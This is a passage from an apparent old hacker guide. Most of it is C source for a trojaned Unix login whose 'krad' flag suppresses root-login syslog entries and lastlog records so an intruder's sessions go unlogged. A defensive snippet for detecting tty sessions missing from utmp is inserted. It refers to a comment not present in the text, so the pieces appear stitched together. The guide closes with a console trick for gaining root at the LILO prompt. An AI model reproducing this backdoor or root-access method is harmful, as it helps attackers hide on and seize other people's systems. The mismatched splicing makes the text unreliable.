(void)setenv("TERM", termenv, 1);

/* mailx will give a funny error msg if you forget this one */
(void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name);
(void)setenv("MAIL",tmp,0);

/* LOGNAME is not documented in login(1) but
HP-UX 6.5 does it. We'll not allow modifying it.
*/
(void)setenv("LOGNAME", pwd->pw_name, 1);
#endif

#ifndef linux
if (tty[sizeof("tty")-1] == 'd')


if(krad == 0)
syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);



#endif
if (pwd->pw_uid == 0)


if(krad == 0)
if (hostname)
syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s",
tty, hostname);
else
syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty);





if (!quietlog) {
struct stat st;

motd();
(void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name);
if (stat(tbuf, &st) == 0 && st.st_size != 0)
(void)printf("You have %smail.\n",
(st.st_mtime > st.st_atime) ? "new " : "");
}

(void)signal(SIGALRM, SIG_DFL);
(void)signal(SIGQUIT, SIG_DFL);
(void)signal(SIGINT, SIG_DFL);
(void)signal(SIGTSTP, SIG_IGN);
(void)signal(SIGHUP, SIG_DFL);

/* discard permissions last so can't get killed and drop core */
if(setuid(pwd->pw_uid) < 0 && pwd->pw_uid) {
syslog(LOG_ALERT, "setuid() failed");
exit(1);
}

/* wait until here to change directory! */
if (chdir(pwd->pw_dir) < 0) {
(void)printf("No directory %s!\n", pwd->pw_dir);
if (chdir("/"))
exit(0);
pwd->pw_dir = "/";
(void)printf("Logging in with home = \"/\".\n");
}

/* if the shell field has a space: treat it like a shell script */
if (strchr(pwd->pw_shell, ' ')) {
char *buff = malloc(strlen(pwd->pw_shell) + 6);
if (buff) {
strcpy(buff, "exec ");
strcat(buff, pwd->pw_shell);
execlp("/bin/sh", "-sh", "-c", buff, (char *)0);
fprintf(stderr, "login: couldn't exec shell script: %s.\n",
strerror(errno));
exit(0);
}
fprintf(stderr, "login: no memory for shell script.\n");
exit(0);
}

tbuf[0] = '-';
strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ?
p + 1 : pwd->pw_shell));

execlp(pwd->pw_shell, tbuf, (char *)0);
(void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));
exit(0);
}

void
getloginname()
{
register int ch;
register char *p;
static char nbuf[UT_NAMESIZE + 1];

for (;;) {
(void)printf("\n%s login: ", thishost); fflush(stdout);
for (p = nbuf; (ch = getchar()) != '\n'; ) {
if (ch == EOF) {
badlogin(username);
exit(0);
}
if (p < nbuf + UT_NAMESIZE)
*p++ = ch;
}
if (p > nbuf)
if (nbuf[0] == '-')
(void)fprintf(stderr,
"login names may not start with '-'.\n");
else {
*p = '\0';
username = nbuf;
break;
}
}
}

void timedout()
{
struct termio ti;

(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);

/* reset echo */
(void) ioctl(0, TCGETA, &ti);
ti.c_lflag = ECHO;
(void) ioctl(0, TCSETA, &ti);
exit(0);
}

int
rootterm(ttyn)
char *ttyn;
#ifndef linux
{
struct ttyent *t;

return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);
}
#else
{
int fd;
char buf[100],*p;
int cnt, more;

fd = open(SECURETTY, O_RDONLY);
if(fd < 0) return 1;

/* read each line in /etc/securetty, if a line matches our ttyline
then root is allowed to login on this tty, and we should return
true. */
for(;;) {
p = buf; cnt = 100;
while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++;
if(more && *p == '\n') {
*p = '\0';
if(!strcmp(buf, ttyn)) {
close(fd);
return 1;
} else
continue;
} else {
close(fd);
return 0;
}
}
}
#endif

jmp_buf motdinterrupt;

void
motd()
{
register int fd, nchars;
void (*oldint)(), sigint();
char tbuf[8192];

if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
return;
oldint = signal(SIGINT, sigint);
if (setjmp(motdinterrupt) == 0)
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
(void)signal(SIGINT, oldint);
(void)close(fd);
}

void sigint()
{
longjmp(motdinterrupt, 1);
}

void
checknologin()
{
register int fd, nchars;
char tbuf[8192];

if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
sleepexit(0);
}
}

void
dolastlog(quiet)
int quiet;
{
struct lastlog ll;
int fd;

if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
if (!quiet) {
if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
ll.ll_time != 0) {
(void)printf("Last login: %.*s ",
24-5, (char *)ctime(&ll.ll_time));

if (*ll.ll_host != '\0')
printf("from %.*s\n",
(int)sizeof(ll.ll_host), ll.ll_host);
else
printf("on %.*s\n",
(int)sizeof(ll.ll_line), ll.ll_line);
}
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
}
memset((char *)&ll, 0, sizeof(ll));
(void)time(&ll.ll_time);
strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
if (hostname)
strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
if(krad == 0)
(void)write(fd, (char *)&ll, sizeof(ll));
(void)close(fd);
}
}

void
badlogin(name)
char *name;
{
if (failures == 0)
return;

if (hostname)
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",
failures, failures > 1 ? "S" : "", hostname, name);
else
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",
failures, failures > 1 ? "S" : "", tty, name);
}

#undef UNKNOWN
#define UNKNOWN "su"

#ifndef linux
char *
stypeof(ttyid)
char *ttyid;
{
struct ttyent *t;

return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}
#endif

void
checktty(user, tty)
char *user;
char *tty;
{
FILE *f;
char buf[256];
char *ptr;
char devname[50];
struct stat stb;

/* no /etc/usertty, default to allow access */
if(!(f = fopen(_PATH_USERTTY, "r"))) return;

while(fgets(buf, 255, f)) {

/* strip comments */
for(ptr = buf; ptr < buf + 256; ptr++)
if(*ptr == '#') *ptr = 0;

strtok(buf, " \t");
if(strncmp(user, buf, 8) == 0) {
while((ptr = strtok(NULL, "\t\n "))) {
if(strncmp(tty, ptr, 10) == 0) {
fclose(f);
return;
}
if(strcmp("PTY", ptr) == 0) {
#ifdef linux
sprintf(devname, "/dev/%s", ptr);
/* VERY linux dependent, recognize PTY as alias
for all pseudo tty's */
if((stat(devname, &stb) >= 0)
&& major(stb.st_rdev) == 4
&& minor(stb.st_rdev) >= 192) {
fclose(f);
return;
}
#endif
}
}
/* if we get here, /etc/usertty exists, there's a line
beginning with our username, but it doesn't contain the
name of the tty where the user is trying to log in.
So deny access! */
fclose(f);
printf("Login on %s denied.\n", tty);
badlogin(user);
sleepexit(1);
}
}
fclose(f);
/* users not mentioned in /etc/usertty are by default allowed access
on all tty's */
}

void
getstr(buf, cnt, err)
char *buf, *err;
int cnt;
{
char ch;

do {
if (read(0, &ch, sizeof(ch)) != sizeof(ch))
exit(1);
if (--cnt < 0) {
(void)fprintf(stderr, "%s too long\r\n", err);
sleepexit(1);
}
*buf++ = ch;
} while (ch);
}

void
sleepexit(eval)
int eval;
{
sleep((unsigned int)5);
exit(eval);
}
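The DemonKit comment above says the backdoored login is "not detected except via 'ps'", and that is exactly the cross-check a defender can run. The following is an added example, not part of DemonKit or of the original guide: it takes rows as `ps -eo pid,tty,user,comm` and `who` would print them (the sample rows are constructed) and reports every tty that carries a process but has no utmp session, which is the footprint left when pututline() and the wtmp write are skipped.

```c
#include <stdio.h>
#include <string.h>

#define TTY_LEN  16
#define NAME_LEN 32

/* One ps(1) row: pid, controlling tty ("?" when none), owner, command. */
struct ps_row { int pid; char tty[TTY_LEN]; char user[NAME_LEN]; char comm[NAME_LEN]; };

/* Parse "PID TTY USER COMM" as `ps -eo pid,tty,user,comm` prints it (header skipped).
   Returns 1 on success, 0 for a blank or unparseable line. */
int parse_ps_row(const char *line, struct ps_row *row) {
    return sscanf(line, "%d %15s %31s %31s", &row->pid, row->tty, row->user, row->comm) == 4;
}

/* Does any who(1) line, i.e. any utmp entry, claim this tty?  who prints
   "USER TTY ..." so the tty is the second token. */
static int tty_in_utmp(const char *tty, const char *who_lines[], int nwho) {
    char user[NAME_LEN], wtty[TTY_LEN];
    int i;
    for (i = 0; i < nwho; i++)
        if (sscanf(who_lines[i], "%31s %15s", user, wtty) == 2 && strcmp(wtty, tty) == 0)
            return 1;
    return 0;
}

/* Report every tty that has a process attached but no utmp session.
   Each tty is reported once; returns the count and writes the names into out[]. */
int find_hidden_sessions(const char *ps_lines[], int nps, const char *who_lines[], int nwho,
                         char out[][TTY_LEN], int max_out) {
    int i, k, found = 0;
    for (i = 0; i < nps; i++) {
        struct ps_row r;
        if (!parse_ps_row(ps_lines[i], &r) || strcmp(r.tty, "?") == 0)
            continue;                          /* daemons have no controlling tty */
        if (tty_in_utmp(r.tty, who_lines, nwho))
            continue;                          /* session is accounted for */
        for (k = 0; k < found; k++)            /* dedupe: one entry per tty */
            if (strcmp(out[k], r.tty) == 0) break;
        if (k == found && found < max_out)
            strcpy(out[found++], r.tty);
    }
    return found;
}

/* Constructed sample output of both commands, not captured from a real host. */
const char *SAMPLE_PS[] = {
    "  900 ?     root  syslogd",
    " 1234 tty1  alice bash",
    " 1300 ttyp0 root  bash",      /* a root shell on a pty that who knows nothing about */
    " 1301 ttyp0 root  vi",
    " 1350 ttyp1 carol bash",
};
const int SAMPLE_PS_N = 5;
const char *SAMPLE_WHO[] = {
    "alice    tty1    May 16 02:10",
    "carol    ttyp1   May 16 03:00",
};
const int SAMPLE_WHO_N = 2;
```

A tty that shows up here, especially one owned by root, is worth comparing against lastlog and the syslog "ROOT LOGIN" lines this login would also have skipped.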




So if you really wanna have root access and have access to the console, reboot
it (carefully, do a ctrl-alt-del) and at the LILO prompt do a:
init=/bin/bash rw (for Linux 2.0.0 and above (I think)).

Don't wonder why I was speaking only about rootshell and dhp.com, there are
lots of other very good hacking pages, but these ones are updated very
quickly and besides, are the best pages I know.


So folks, this was it...
First version of my USER's GUIDE 1.0.
Maybe I'll do better next time, and if I have more time, I'll add about
50(more) other exploits, remote ones, new stuff, new techniques, etc...
See ya, folks !
GOOD NIGHT !!! (it's 6.am now).
DAMN !!!


ARGHHH! I forgot... My e-mail address is .
(for now).
